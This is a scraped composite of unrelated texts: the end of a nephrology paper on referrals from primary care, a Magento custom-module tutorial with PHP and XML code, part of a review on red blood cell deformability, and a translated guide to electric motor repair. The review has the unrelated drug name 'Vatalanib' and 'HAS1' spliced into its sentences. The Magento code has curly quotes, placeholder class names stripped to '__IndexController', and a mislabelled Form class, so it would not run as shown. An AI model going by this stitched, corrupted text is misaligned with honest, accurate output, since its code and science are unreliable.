In the case of a preferential referral of a patient suffering severe renal failure, we can know the current glomerular filtration rate and the evolution from previous laboratory results, and the same can be said of requests for referral due to proteinuria. Furthermore, in the case of AHT, the progression of medication prescribed can be taken into account, and strategies for clinical treatment can be suggested according to the clinical protocols from the consensus, without the need to perform a visit.   In conclusion, our coordinated care programme with primary health care providers has yielded a clear improvement in the adequacy of patient prioritisation and referrals to the nephrology department. The fundamental elements of this process have been: a programme agreed upon with the primary care management team, the SEN-SEMFYC consensus document on CKD, a shared clinical information system, in-person and electronic consultations, explanatory reports and recommendations in the cases of denied referrals, and a programme for continuous training of primary health care providers. Table 1. General criteria established in the consensus for referring patients from primary care to nephrology specialists Table 2. Reasons for rejecting requests for first visits sent by primary health care providers Figure 1. Progression of the first nephrology visits requested by primary health care providers Bibliography [1] Nacional Kidney Foundation. K/DOQI clinical practice guidelines for chronic kidney disease. Definition and classification of stages of chronic kidney disease. Am J Kidney Dis 2002;39(Suppl 1):S46-S75. [2] Nacional Kidney Foundation. K/DOQI clinical practice guidelines for chronic kidney disease. Evaluation of laboratory measurements for clinical assessment of kidney disease. Am J Kidney Dis 2002;39(Supl 1):S76-S110. [3] Zhang QL, Rothenbacher D. Prevalence of chronic kidney disease in population-based studies: Systematic review. BMC Public Health 2008;8:117. [Pubmed] [4] Coresh J, Selvin E, Stevens LA, et al. Prevalence of chronic kidney disease in the United States. JAMA 2007;298(17):2038-47. [Pubmed] [5] Otero A, de Francisco A, Gayoso P, Garc??a F, on behalf of the EPIRCE Study Group. Prevalence of chronic renal disease in Spain: Results of the EPIRCE study. Nefrologia 2010;30(1):78-86. [Pubmed] [6] Banegas Banegas JR. Epidemiolog??a de la hipertensi??n arterial en Espa??a. Situaci??n actual y perspectivas. Hipertensi??n 2005;22(9):353-62. [7] Alc??zar R, Mart??n de Francisco AL. Acci??n estrat??gica de la S.E.N. frente a la enfermedad renal.??Nefrologia 2006;26:1-4. [8] Torregrosa I, Sol??s M, Pascual B, Ramos B, Gonz??lez M, Ramos C, et al.??Resultados preliminares de la implantaci??n de un protocolo conjunto de manejo de la enfermedad renal cr??nica entre atenci??n prim??ria y nefrologia. Nefrologia 2007;27:162-7. [Pubmed] [9] Alc??zar R, Egocheaga I, Ortes L, Lobos JM, Gonz??lez Parra E, ??lvarez Guisasola F, et al.??Documento de consenso S.E.N.-semFYC sobre la enfermedad renal cr??nica. Nefrologia 2008;28(3):273-82. [Pubmed] [10] Organizaci??n Mundial de la Salud. Alma-Ata 1978. Atenci??n Primaria de Salud. Ginebra: OMS, 1978. [11] G??rvas J, P??rez Fern??ndez M, Palomo Cobos L, Pastor S??nchez R. Veinte a??os de reforma de la Atenci??n Primaria en Espa??a. Valoraci??n para un aprendizaje por acierto/error. Madrid: Ministerio de Sanidad y Consumo; 2005. Disponible en: www.msc.es [12] Keith DS, Nichols GA, Gullion CM, Brown JB, Smith DH. Longitudinal follow-up and outcomes among a population with chronic kidney disease in a large managed care organization. Arch Intern Med 2004;164:659-63. [Pubmed] [13] Conway B, Webster A, Ramsay G, Morgan N, Neary J, Whitworth C, et al. Predicting mortality and uptake of renal replacement therapy in patients with stage 4 chronic kidney disease. Nephrol Dial Transplant 2009;24(6):1930-7. [Pubmed] [14] Epstein M. Aging and kidney. J Am Soc Nephrol 1996;7:1106-22. [Pubmed] [15] Lindeman RD, Goldman R. Anatomic and physiologic age changes in the kidney. Exp Gerontol 1986;21:379-406. [Pubmed] [16] Xhou XJ, Rakheja D, Yu X, Saxena R, Vaziri ND, Silva FG. The aging kidney.??Kidney Int 2008;74:710-20. [Pubmed] [17] Hemmelgarn BR, Zhang J, Manns BJ, Tonelli M, Larsen E, Ghali WA,??et al. Progression of kidney disfunction in the community-dwelling elderly. Kidney Int 2006;69:2155-61. [Pubmed] [18] Heras M, Fern??ndez Reyes MJ, Guerrero MT, S??nchez R, Mu??oz A, Mac??as MC, et al.??Ancianos con enfermedad renal cr??nica: ??qu?? ocurre a los 24 meses de seguimiento? Nefrologia 2009;29(4):343-9. [Pubmed] [19] O??Hare AM, Bertenthal D, Walter LC, Garg AX, Covinsky K, Kaufman JS, et al. When to refer patients with chronic kidney disease for vascular access surgery: Should age be a consideration? Kidney Int 2007;71:555-61. [Pubmed] [20] Jones C, Roderick P, Harris S, Rogerson M. An evaluation of a shared primary and secondary care nephrology service for managing patients with moderate to advanced CKD. Am J Kidney Dis 2006;47(1):103-14. [Pubmed] [21] Oppenheimer F, Garc??a M, L??pez T, Campistol JM. Coordinaci??n entre unidad de trasplante renal y servicio de nefrologia no trasplantador. En: Gu??a de vuelta a di??lisis del paciente trasplantado. Nefrologia 2009;29(Supl 1):S72-S77. Idiomas Nefrología (English Edition) Subscribe to our newsletter Article options Tools es en ¿Es usted profesional sanitario apto para prescribir o dispensar medicamentos? Are you a health professional able to prescribe or dispense drugs?
__label__pos
0.549826
Magento - Create Custom Module with Custom Database Table You can easily create Magento custom modules by going through the common module structure of Magento. Here we have explained all required module structure file for creating custom Magento module. Let’s setup our directory structure: /app/code/local/<Namespace>/<Module>/ Block/ controllers/ etc/ Model/ Mysql4/ / sql/ _setup/ Activate Module Magento requires there to be an XML file that tells Magento to look for and use your custom module. /app/etc/modules/<Namespace>_<Module>.xml <?xml version=“1.0”?> <config> <modules> <[Namespace]_[Module]> <active>true</active> <codePool>local</codePool> </[Namespace]_[Module]> </modules> </config> Also you can disable your module in the Configuration menu on the backend via the Advanced tab. Create Controller /app/code/local/<Namespace>/<Module>/controllers/IndexController.php <?php class __IndexController extends Mage_Core_Controller_Front_Action { public function indexAction() { $this->loadLayout(); $this->renderLayout(); } } Create Configuration XML /app/code/local/<Namespace>/<Module>/etc/config.xml <?xml version=“1.0”?> <config> <modules> <[Namespace]_[Module]> <version>0.1.0</version> </[Namespace]_[Module]> </modules> <frontend> <routers> <[module]> <use>standard</use> <args> <module>[Namespace]_[Module]</module> <frontName>[module]</frontName> </args> </[module]> </routers> <layout> <updates> <[module]> <file>[module].xml</file> </[module]> </updates> </layout> </frontend> <global> <models> <[module]> <class>[Namespace]_[Module]_Model</class> <resourceModel>[module]_mysql4</resourceModel> </[module]> <[module]_mysql4> <class>[Namespace]_[Module]_Model_Mysql4</class> <entities> <[module]> <table>[module]</table> </[module]> </entities> </[module]_mysql4> </models> <resources> <[module]_setup> <setup> <module>[Namespace]_[Module]</module> </setup> <connection> <use>core_setup</use> </connection> </[module]_setup> <[module]_write> <connection> <use>core_write</use> </connection> </[module]_write> <[module]_read> <connection> <use>core_read</use> </connection> </[module]_read> </resources> <blocks> <[module]> <class>[Namespace]_[Module]_Block</class> </[module]> </blocks> <helpers> <[module]> <class>[Namespace]_[Module]_Helper</class> </[module]> </helpers> </global> </config> Create Helper /app/code/local/<Namespace>/<Module>/Helper/Data.php <?php class __Helper_Data extends Mage_Core_Helper_Abstract { } Create Models If you are quite new to Magento you should pay attention to one of its specifics! The Constructors below are not the usual PHP-Constructors!! Keeping that in mind can save hours of frustrating crashes ;) /app/code/local/<Namespace>/<Module>/Model/<Module>.php <?php class <Namespace>_<Module>_Model_<Module> extends Mage_Core_Model_Abstract { public function _construct() { parent::_construct(); $this->_init(‘<module>/<module>’); /app/code/local/<Namespace>/<Module>/Model/Mysql4/<Module>.php <?php class <Namespace>_<Module>_Model_Mysql4_<Module> extends Mage_Core_Model_Mysql4_Abstract { public function _construct() { $this->_init(‘<module>/<module>’, ‘<module>_id’); } } NOTE: The ‘_id’ refers to the PRIMARY KEY in your database table. /app/code/local/<Namespace>/<Module>/Model/Mysql4/<Module>/Collection.php <?php class <Namespace>_<Module>_Model_Mysql4_<Module>_Collection extends Mage_Core_Model_Mysql4_Collection_Abstract { public function _construct() { //parent::__construct(); $this->_init(‘<module>/<module>’); } } SQL Setup /app/code/local/<Namespace>/<Module>/sql/<module>_setup/mysql4-install-0.1.0.php <?php $installer = $this; $installer->startSetup(); $installer->run(“ — DROP TABLE IF EXISTS {$this->getTable(‘<module>’)}; CREATE TABLE {$this->getTable(‘<module>’)} ( `<module>_id` int(11) unsigned NOT NULL auto_increment, `title` varchar(255) NOT NULL default ”, `content` text NOT NULL default ”, `status` smallint(6) NOT NULL default ‘0’, `created_time` datetime NULL, `update_time` datetime NULL, PRIMARY KEY (`<module>_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; “); $installer->endSetup(); NOTE: Please note the text that needs to be replaced. This SQL structure is up to you, this is merely a starting point. Note Important: If you add fields and couldn’t save data in these fields please try to go to System?Cache Management Then 1.Flush Cache Storage 2.Flush Magento Cache. Template Design /app/design/frontend/<interface>/<theme>/layout/<module>.xml /layout/.xml <?xml version=“1.0”?> <layout version=“0.1.0”> <[module]_index_index> <reference name=“content”> <block type=“[module]/[module]” name=“[module]” /> </reference> </[module]_index_index> </layout> NOTE: The block type will automatically figure out what template file to use based on the second [module] declaration. As an alternate way of declaring what template file to use you can use this: /app/design/frontend/<interface>/<theme>/layout/<module>.xml <?xml version=“1.0”?> <layout version=“0.1.0”> <[module]_index_index> <reference name=“content”> <block type=“core/template” name=“[module]” template=“[module]/[module].phtml” /> </reference> </[module]_index_index> </layout> /app/design/frontend/<interface>/<theme>/template/<module>/<module>.phtml <h4><?php echo $this->__(‘Module List’) ?></h4> <?php /* This will load one record from your database table. load(<module>_id) will load whatever ID number you give it. */ /* $news = Mage::getModel(‘<module>/<module>’)->load(1); echo $news->get<Module>Id(); echo $news->getTitle(); echo $news->getContent(); echo $news->getStatus(); */ /* This block of code loads all of the records in the database table. It will iterate through the collection and the first thing it will do is set the Title to the current value of $i which is incremented each iteration and then echo that value back out. At the very end it will save the entire collection. */ /* $i = 0; $collection = Mage::getModel(‘<module>/<module>’)->getCollection(); $collection->setPageSize(5); $collection->setCurPage(2); $size = $collection->getSize(); $cnt = count($collection); foreach ($collection as $item) { $i = $i+1; $item->setTitle($i); echo $item->getTitle(); } $collection->walk(‘save’); */ /* This shows how to load one value, change something and save it. */ /* $object = Mage::getModel(‘<module>/<module>’)->load(1); $object->setTitle(‘This is a changed title’); $object->save(); */ Directory Additions Here is the revised directory setup due to the additions and changes we need for the backend module. /app/code/local/<Namespace>/<Module>/ Block/ Adminhtml/ / Edit/ Tab/ controllers/ Adminhtml/ etc/ Helper/ Model/ Mysql4/ / sql/ _setup/ Blocks These control the setup and appearance of your grids and the options that they display. NOTE: Please note the fact that Block comes before Adminhtml in the class declaration. In any of the Magento modules in Adminhtml it is the opposite. For your module to work it has to be Block_Adminhtml otherwise you will get a ‘Cannot redeclare module...’ error. /app/code/local/<Namespace>/<Module>/Block/Adminhtml/<Module>.php <?php class <Namespace>_<Module>_Block_Adminhtml_<Module> extends Mage_Adminhtml_Block_Widget_Grid_Container { public function __construct() { $this->_controller = ‘adminhtml_<module>’; $this->_blockGroup = ‘<module>’; $this->_headerText = Mage::helper(‘<module>’)->__(‘Item Manager’); $this->_addButtonLabel = Mage::helper(‘<module>’)->__(‘Add Item’); parent::__construct(); } } /app/code/local/<Namespace>/<Module>/Block/Adminhtml/<Module>/Edit.php <?php class <Namespace>_<Module>_Block_Adminhtml_<Module>_Edit extends Mage_Adminhtml_Block_Widget_Form_Container { public function __construct() { parent::__construct(); $this->_objectId = ‘id’; $this->_blockGroup = ‘<module>’; $this->_controller = ‘adminhtml_<module>’; $this->_updateButton(‘save’, ‘label’, Mage::helper(‘<module>’)->__(‘Save Item’)); $this->_updateButton(‘delete’, ‘label’, Mage::helper(‘<module>’)->__(‘Delete Item’)); } public function getHeaderText() { if( Mage::registry(‘<module>_data’) && Mage::registry(‘<module>_data’)->getId() ) { return Mage::helper(‘<module>’)->__(“Edit Item ‘%s'”, $this->htmlEscape(Mage::registry(‘<module>_data’)->getTitle())); } else { return Mage::helper(‘<module>’)->__(‘Add Item’); } } } /app/code/local/<Namespace>/<Module>/Block/Adminhtml/<Module>/Grid.php <?php class <Namespace>_<Module>_Block_Adminhtml_<Module>_Grid extends Mage_Adminhtml_Block_Widget_Grid { public function __construct() { parent::__construct(); $this->setId(‘<module>Grid’); // This is the primary key of the database $this->setDefaultSort(‘<module>_id’); $this->setDefaultDir(‘ASC’); $this->setSaveParametersInSession(true); } protected function _prepareCollection() { $collection = Mage::getModel(‘<module>/<module>’)->getCollection(); $this->setCollection($collection); return parent::_prepareCollection(); } protected function _prepareColumns() { $this->addColumn(‘<module>_id’, array( ‘header’ => Mage::helper(‘<module>’)->__(‘ID’), ‘align’ =>‘right’, ‘width’ => ’50px’, ‘index’ => ‘<module>_id’, )); $this->addColumn(‘title’, array( ‘header’ => Mage::helper(‘<module>’)->__(‘Title’), ‘align’ =>‘left’, ‘index’ => ‘title’, )); /* $this->addColumn(‘content’, array( ‘header’ => Mage::helper(‘<module>’)->__(‘Item Content’), ‘width’ => ‘150px’, ‘index’ => ‘content’, )); */ $this->addColumn(‘created_time’, array( ‘header’ => Mage::helper(‘<module>’)->__(‘Creation Time’), ‘align’ => ‘left’, ‘width’ => ‘120px’, ‘type’ => ‘date’, ‘default’ => ‘–‘, ‘index’ => ‘created_time’, )); $this->addColumn(‘update_time’, array( ‘header’ => Mage::helper(‘<module>’)->__(‘Update Time’), ‘align’ => ‘left’, ‘width’ => ‘120px’, ‘type’ => ‘date’, ‘default’ => ‘–‘, ‘index’ => ‘update_time’, )); $this->addColumn(‘status’, array( ‘header’ => Mage::helper(‘<module>’)->__(‘Status’), ‘align’ => ‘left’, ‘width’ => ’80px’, ‘index’ => ‘status’, ‘type’ => ‘options’, ‘options’ => array( 1 => ‘Active’, 0 => ‘Inactive’, ), )); return parent::_prepareColumns(); } public function getRowUrl($row) { return $this->getUrl(‘*/*/edit’, array(‘id’ => $row->getId())); } } /app/code/local/<Namespace>/<Module>/Block/Adminhtml/<Module>/Edit/Form.php <?php class <Namespace>_<Module>_Block_Adminhtml_<Module>_Edit_Tab_Form extends Mage_Adminhtml_Block_Widget_Form { protected function _prepareForm() { $form = new Varien_Data_Form(); $this->setForm($form); $fieldset = $form->addFieldset(‘<module>_form’, array(‘legend’=>Mage::helper(‘<module>’)->__(‘Item information’))); $fieldset->addField(‘title’, ‘text’, array( ‘label’ => Mage::helper(‘<module>’)->__(‘Title’), ‘class’ => ‘required-entry’, ‘required’ => true, ‘name’ => ‘title’, )); $fieldset->addField(‘status’, ‘select’, array( ‘label’ => Mage::helper(‘<module>’)->__(‘Status’), ‘name’ => ‘status’, ‘values’ => array( array( ‘value’ => 1, ‘label’ => Mage::helper(‘<module>’)->__(‘Active’), ), array( ‘value’ => 0, ‘label’ => Mage::helper(‘<module>’)->__(‘Inactive’), ), ), )); $fieldset->addField(‘content’, ‘editor’, array( ‘name’ => ‘content’, ‘label’ => Mage::helper(‘<module>’)->__(‘Content’), ‘title’ => Mage::helper(‘<module>’)->__(‘Content’), ‘style’ => ‘width:98%; height:400px;’, ‘wysiwyg’ => false, ‘required’ => true, )); if ( Mage::getSingleton(‘adminhtml/session’)->get<Module>Data() ) { $form->setValues(Mage::getSingleton(‘adminhtml/session’)->get<Module>Data()); Mage::getSingleton(‘adminhtml/session’)->set<Module>Data(null); } elseif ( Mage::registry(‘<module>_data’) ) { $form->setValues(Mage::registry(‘<module>_data’)->getData()); } return parent::_prepareForm(); } } /app/code/local/<Namespace>/<Module>/Block/Adminhtml/<Module>/Edit/Tabs.php <?php class <Namespace>_<Module>_Block_Adminhtml_<Module>_Edit_Tabs extends Mage_Adminhtml_Block_Widget_Tabs { public function __construct() { parent::__construct(); $this->setId(‘<module>_tabs’); $this->setDestElementId(‘edit_form’); $this->setTitle(Mage::helper(‘<module>’)->__(‘News Information’)); } protected function _beforeToHtml() { $this->addTab(‘form_section’, array( ‘label’ => Mage::helper(‘<module>’)->__(‘Item Information’), ‘title’ => Mage::helper(‘<module>’)->__(‘Item Information’), ‘content’ => $this->getLayout()->createBlock(‘<module>/adminhtml_<module>_edit_tab_form’)->toHtml(), )); return parent::_beforeToHtml(); } } /app/code/local/<Namespace>/<Module>/Block/Adminhtml/<Module>/Edit/Tab/Form.php <?php class <Namespace>_<Module>_Block_Adminhtml_<Module>_Edit_Tab_Form extends Mage_Adminhtml_Block_Widget_Form { protected function _prepareForm() { $form = new Varien_Data_Form(); $this->setForm($form); $fieldset = $form->addFieldset(‘<module>_form’, array(‘legend’=>Mage::helper(‘<module>’)->__(‘Item information’))); $fieldset->addField(‘title’, ‘text’, array( ‘label’ => Mage::helper(‘<module>’)->__(‘Title’), ‘class’ => ‘required-entry’, ‘required’ => true, ‘name’ => ‘title’, )); $fieldset->addField(‘status’, ‘select’, array( ‘label’ => Mage::helper(‘<module>’)->__(‘Status’), ‘name’ => ‘status’, ‘values’ => array( array( ‘value’ => 1, ‘label’ => Mage::helper(‘<module>’)->__(‘Active’), ), array( ‘value’ => 0, ‘label’ => Mage::helper(‘<module>’)->__(‘Inactive’), ), ), )); $fieldset->addField(‘content’, ‘editor’, array( ‘name’ => ‘content’, ‘label’ => Mage::helper(‘<module>’)->__(‘Content’), ‘title’ => Mage::helper(‘<module>’)->__(‘Content’), ‘style’ => ‘width:98%; height:400px;’, ‘wysiwyg’ => false, ‘required’ => true, )); if ( Mage::getSingleton(‘adminhtml/session’)->get<Module>Data() ) { $form->setValues(Mage::getSingleton(‘adminhtml/session’)->get<Module>Data()); Mage::getSingleton(‘adminhtml/session’)->set<Module>Data(null); } elseif ( Mage::registry(‘<module>_data’) ) { $form->setValues(Mage::registry(‘<module>_data’)->getData()); } return parent::_prepareForm(); } } Controller /app/code/local/<Namespace>/<Module>/controllers/Adminhtml/<Module>Controller.php <?php class <Namespace>_<Module>_Adminhtml_<Module>Controller extends Mage_Adminhtml_Controller_Action { protected function _initAction() { $this->loadLayout() ->_setActiveMenu(‘<module>/items’) ->_addBreadcrumb(Mage::helper(‘adminhtml’)->__(‘Items Manager’), Mage::helper(‘adminhtml’)->__(‘Item Manager’)); return $this; } public function indexAction() { $this->_initAction(); $this->_addContent($this->getLayout()->createBlock(‘<module>/adminhtml_<module>’)); $this->renderLayout(); } public function editAction() { $<module>Id = $this->getRequest()->getParam(‘id’); $<module>Model = Mage::getModel(‘<module>/<module>’)->load($<module>Id); if ($<module>Model->getId() || $<module>Id == 0) { Mage::register(‘<module>_data’, $<module>Model); $this->loadLayout(); $this->_setActiveMenu(‘<module>/items’); $this->_addBreadcrumb(Mage::helper(‘adminhtml’)->__(‘Item Manager’), Mage::helper(‘adminhtml’)->__(‘Item Manager’)); $this->_addBreadcrumb(Mage::helper(‘adminhtml’)->__(‘Item News’), Mage::helper(‘adminhtml’)->__(‘Item News’)); $this->getLayout()->getBlock(‘head’)->setCanLoadExtJs(true); $this->_addContent($this->getLayout()->createBlock(‘<module>/adminhtml_<module>_edit’)) ->_addLeft($this->getLayout()->createBlock(‘<module>/adminhtml_<module>_edit_tabs’)); $this->renderLayout(); } else { Mage::getSingleton(‘adminhtml/session’)->addError(Mage::helper(‘<module>’)->__(‘Item does not exist’)); $this->_redirect(‘*/*/’); } } public function newAction() { $this->_forward(‘edit’); } public function saveAction() { if ( $this->getRequest()->getPost() ) { try { $postData = $this->getRequest()->getPost(); $<module>Model = Mage::getModel(‘<module>/<module>’); $<module>Model->setId($this->getRequest()->getParam(‘id’)) ->setTitle($postData[‘title’]) ->setContent($postData[‘content’]) ->setStatus($postData[‘status’]) ->save(); Mage::getSingleton(‘adminhtml/session’)->addSuccess(Mage::helper(‘adminhtml’)->__(‘Item was successfully saved’)); Mage::getSingleton(‘adminhtml/session’)->set<Module>Data(false); $this->_redirect(‘*/*/’); return; } catch (Exception $e) { Mage::getSingleton(‘adminhtml/session’)->addError($e->getMessage()); Mage::getSingleton(‘adminhtml/session’)->set<Module>Data($this->getRequest()->getPost()); $this->_redirect(‘*/*/edit’, array(‘id’ => $this->getRequest()->getParam(‘id’))); return; } } $this->_redirect(‘*/*/’); } public function deleteAction() { if( $this->getRequest()->getParam(‘id’) > 0 ) { try { $<module>Model = Mage::getModel(‘<module>/<module>’); $<module>Model->setId($this->getRequest()->getParam(‘id’)) ->delete(); Mage::getSingleton(‘adminhtml/session’)->addSuccess(Mage::helper(‘adminhtml’)->__(‘Item was successfully deleted’)); $this->_redirect(‘*/*/’); } catch (Exception $e) { Mage::getSingleton(‘adminhtml/session’)->addError($e->getMessage()); $this->_redirect(‘*/*/edit’, array(‘id’ => $this->getRequest()->getParam(‘id’))); } } $this->_redirect(‘*/*/’); } /** * Product grid for AJAX request. * Sort and filter result for example. */ public function gridAction() { $this->loadLayout(); $this->getResponse()->setBody( $this->getLayout()->createBlock(‘importedit/adminhtml_<module>_grid’)->toHtml() ); } } XML Configuration Changes /app/code/local/<Namespace>/<Module>/etc/config.xml <?xml version=“1.0”?> <config> <modules> <[Namespace]_[Module]> <version>0.1.0</version> </[Namespace]_[Module]> </modules> <frontend> <routers> <[module]> <use>standard</use> <args> <module>[Namespace]_[Module]</module> <frontName>[module]</frontName> </args> </[module]> </routers> <layout> <updates> <[module]> <file>[module].xml</file> </[module]> </updates> </layout> </frontend> <admin> <routers> <[module]> <use>admin</use> <args> <module>[Namespace]_[Module]</module> <frontName>[module]</frontName> </args> </[module]> </routers> </admin> <adminhtml> <menu> <[module] module=“[module]”> <title>[Module]</title> <sort_order>71</sort_order> <children> <items module=“[module]”> <title>Manage Items</title> <sort_order>0</sort_order> <action>[module]/adminhtml_[module]</action> </items> </children> </[module]> </menu> <acl> <resources> <all> <title>Allow Everything</title> </all> <admin> <children> <[module]> <title>[Module] Module</title> <sort_order>200</sort_order> </[module]> </children> </admin> </resources> </acl> <layout> <updates> <[module]> <file>[module].xml</file> </[module]> </updates> </layout> </adminhtml> <global> <models> <[module]> <class>[Namespace]_[Module]_Model</class> <resourceModel>[module]_mysql4</resourceModel> </[module]> <[module]_mysql4> <class>[Namespace]_[Module]_Model_Mysql4</class> <entities> <[module]> <table>[module]</table> </[module]> </entities> </[module]_mysql4> </models> <resources> <[module]_setup> <setup> <module>[Namespace]_[Module]</module> </setup> <connection> <use>core_setup</use> </connection> </[module]_setup> <[module]_write> <connection> <use>core_write</use> </connection> </[module]_write> <[module]_read> <connection> <use>core_read</use> </connection> </[module]_read> </resources> <blocks> <[module]> <class>[Namespace]_[Module]_Block</class> </[module]> </blocks> <helpers> <[module]> <class>[Namespace]_[Module]_Helper</class> </[module]> </helpers> </global> </config> XML Layout /app/design/adminhtml/<interface>/<theme>/layout/<module>.xml <?xml version=“1.0”?> <layout version=“0.1.0”> <[module]_adminhtml_[module]_index> <reference name=“content”> <block type=“[module]/adminhtml_[module]” name=“[module]” /> </reference> </[module]_adminhtml_[module]_index> </layout> You may like these posts
__label__pos
0.999008
Red blood cells (RBCs) possess a unique capacity for undergoing cellular Red blood cells (RBCs) possess a unique capacity for undergoing cellular deformation to navigate across various human microcirculation vessels, enabling them to pass through capillaries that are smaller than their diameter and to carry out their role as gas carriers between blood and tissues. such as hereditary disorders (e.g., spherocytosis, elliptocytosis, ovalocytosis, and stomatocytosis), metabolic disorders (e.g., diabetes, hypercholesterolemia, obesity), adenosine triphosphate-induced membrane changes, oxidative stress, and paroxysmal nocturnal hemoglobinuria. Microfluidic techniques have been identified as the key to develop state-of-the-art dynamic experimental models for elucidating the significance of RBC membrane alterations in pathological conditions and the role that such alterations play HAS1 in the microvasculature flow dynamics. I.?INTRODUCTION Red blood cells (RBCs) possess a unique capacity for Vatalanib undergoing cellular deformation to navigate across various human microcirculation vessels, enabling them to pass through capillaries that are smaller than their diameter and to carry out their role as gas carriers between blood and tissues.1C4 Pathological alterations in RBC deformability have been associated with various diseases5 such as malaria,6,7 sickle cell anemia,8 diabetes,9 hereditary disorders,10 myocardial infarction,11 and paroxysmal nocturnal hemoglobinuria (PNH).12 Because Vatalanib of its pathophysiological importance, measurement of RBC deformability has been the focus of numerous studies over the past decades.2,13C15 Several comprehensive reviews have been published related to this issue,2,16C18 and the most recent have focused on the characterization of biomechanical properties of pathological RBCs, particularly involving sickle cell disease and was observed in experiments Vatalanib as well,66,79C84 estimations of cell membrane viscoelastic properties such as RBC shear elastic modulus and surface viscosity by using diverging channels,65 measurements of the RBC time recovery constant in start-up experiments,35 cell characterization by electric impedance microflow cytometry,85 and single-cell microchamber array (SiCMA) technology86,87 (Figures 3(D1) and 3(D2)). The latter applies a dielectrophoretic force to deform RBCs and used image analysis to analyse RBCs shape changes, allowing the evaluation the deformability of single RBCs in terms of Elongation Index %, defined as (x???y)/(x?+?y) 100, where x and y are RBC major and minor axes, respectively. Dielectrophoretic force has been also used for the real-time separation of blood cells for a droplets of whole blood.88 Recently, RBC geometrical parameters such as RBC volume, surface area, and distribution width (RDW), which are a measurement of the size variation as well as an index of the heterogeneity that can be used as a significant diagnostic and prognostic tool in cardiovascular and thrombotic disorders,90 have been measured in microcapillary flow using high-speed microscopy.81,91,92 The use of different techniques leads to various measured values, meaning that deformation of RBCs deeply depend on the deformation protocol. This fact has been widely discussed in recent papers which state that the mechanical response of RBC is not linear.93,94 The wide discrepancies resulting from the use of different techniques can be observed in the large standard deviation of the values presented in Table ?TableI,I, where the average values of the geometric and mechanical properties of healthy RBCs present in the literature Vatalanib are reported together with their related experimental techniques. TABLE I. Geometric and mechanical properties of RBCs. In order to identify which technique has been used to measure the RBCs biomechanical properties, in Figure ?Figure4,4, eight categories have been reported, such as micropipette, flickering, viscometry, microcapillary flow/microfluidics, ektacytometry, AFM, optical tweezers, and other, where the voice other includes reflection interference contrast micrograph, microscopic holography, hanging cells, flow channel, magnetic field, laminar flow system, and optical interferometric technique. Data from both healthy and pathological RBCs (Hereditary membrane disorders, metabolic disorders and ATP-induced membrane changes, oxidative stress, PNH, Malaria, and Sickle cell anemia) have been considered to realize Figure ?Figure44. FIG. 4. Techniques used to measure a specific RBC biomechanical property. IV.?HEREDITARY MEMBRANE DISORDERS Hereditary disorders involving the erythrocyte membrane include spherocytosis (HS), elliptocytosis (HE), ovalocytosis, and stomatocytosis (HSt). These syndromes are caused by a deficiency or dysfunction of one of the membrane.
__label__pos
0.894363
Several practical methods in motor repair (Two) 26/10/2019 image 5Repair of the motor after the "and the hood" After the winding type motor and the headgear break through the short circuit, the wire end is usually burned for a period of time, and the length of the wire can be used for repair. The specific method is as follows: Use 1-2 250W infrared bulbs to locally soften the rotor end to release the gun, remove the copper foam, and then bend the burnt (flat) copper wire head slightly (for soldering). The length wire can be silver soldered or soldered. Care should be taken to protect the windings during welding to avoid burnout (protected with wet asbestos cloth (rope)). Flatten the weld after welding. After straightening the copper wire, wrap a layer of glass ribbon, apply insulating varnish, and dry it with an infrared bulb. When the wire is placed in the original position, a thin film of green paper is placed underneath, and then the excess portion of the copper wire is cut off, and the sleeve is placed and soldered. Finally paint at the repair site and dry. The copper sleeve is applied to the hood and the original size is made. Before the production, the copper piece should be tinned. The motor with the headgear has a large capacity, and it is difficult to disassemble and install. The above method is suitable for on-site repair. 6 removal of the old winding of the motor Generally, the soft windings must be baked before the wires are removed. However, for larger capacity motors, it is more difficult to soften and disconnect the wires, so the old windings can be removed by the following methods: Use a flat spatula to remove one end of the winding and the cut is flush with the notch. The other end of the winding is cut with a metal scissors, and then the enameled wire in the groove is punched out with a suitable copper rod to clean the groove. If the copper rods are suitable and the method of operation is correct, the wires in each slot can be punched out together. When using the flat shovel, be careful not to smash the stator core. When the line is removed by the above method, the drying process before the removal can be omitted, the time is saved, the electric energy is saved, and the disassembly is relatively labor-saving. However, this method is suitable for motors with a capacity of 7.5 KW or less. Since the casing of a small motor or a micromotor is small, it is inconvenient to operate using a flat shovel. 7 new brush grinding The DC motor or rotor is a revolving motor renewing brush. When the brush holder is perpendicular to the surface of the commutator, the method of grinding the brush is to lay a piece of sandpaper on the surface of the commutator and hold the same type of new electric motor. The brush reciprocates frictionally along the commutator, and the surface of the brush is quickly ground to the arc surface that matches the surface of the commutator. Use coarser sandpaper first, then fine sandpaper. When grinding, hold the brush to be positive, and move back and forth along the axis of the commutator, not skewed, and the reciprocating stroke should not be too long. Care should be taken to prevent brush powder from entering the armature and commutator grooves. After grinding, put the brush into the brush holder. After the starter motor runs for a few minutes, take out each brush and check that the contact surface generally accounts for more than 80% of the total area. Otherwise, it should be re-ground until it is qualified. When the brush holder of the motor is not perpendicular to the surface of the commutator, the following method should be adopted: the sandpaper is laid on the plane, and the hand brush is used to grind a slope according to the inclination angle of the brush holder. Then put the brush into the brush holder and turn the motor rotor by hand, so that the light point will be polished on the inclined surface of the brush, and then the light spot will be polished with sandpaper (can also be scraped with a knife). After grinding, put the brush into the brush holder and turn the motor rotor by hand. The same will be polished out, and the area is larger than the first time. After doing this several times, the contact surface of the brush will become larger and larger and gradually form an arc. When polishing bright spots, do not polish too much each time, especially to the last time, be careful, just rub a little with fine sandpaper. If you rub more, the contact surface will become smaller. It has been proved by practice that the inclined brush is ground in this way, and the time is fast and the effect is good. 8 emergency repair of rotor journal and end cap bearing chamber wear The specific methods and steps are as follows: 1. Wash the area with ethanol or gasoline repeatedly. 2. The ternary nylon ethanol solution is heated to a transparent liquid, and the liquid is thinly applied to the worn portion with a small brush. For a slightly larger amount of wear, the heating time may be appropriately extended to make the solution thicker and then coated. Generally, it needs to be applied several times to reach the required thickness. After the first application, it should be placed for about 3 minutes, and it can be dried by itself. When it is not sticky, it can be applied for the second time. 3, dry after coating, can be heated (temperature does not exceed 80 ° C, time 0.5-1 hours), it can also let it dry naturally (at room temperature 20 ° C, placed in a ventilated place for about 36 hours).   4, the wear amount is less than 0.10mm, after drying, can be used. If the wear amount is greater than 0.10mm, in order to ensure the concentricity of the stator and the rotor during the assembly of the motor, it is necessary to perform turning after coating. During turning (if the original bearing outer ring and inner ring size are within the tolerance range), the repaired end cap bearing chamber can be processed according to P6. If the journal is repaired, it can be processed according to r6. After the coated nylon solution is completely dried, it has 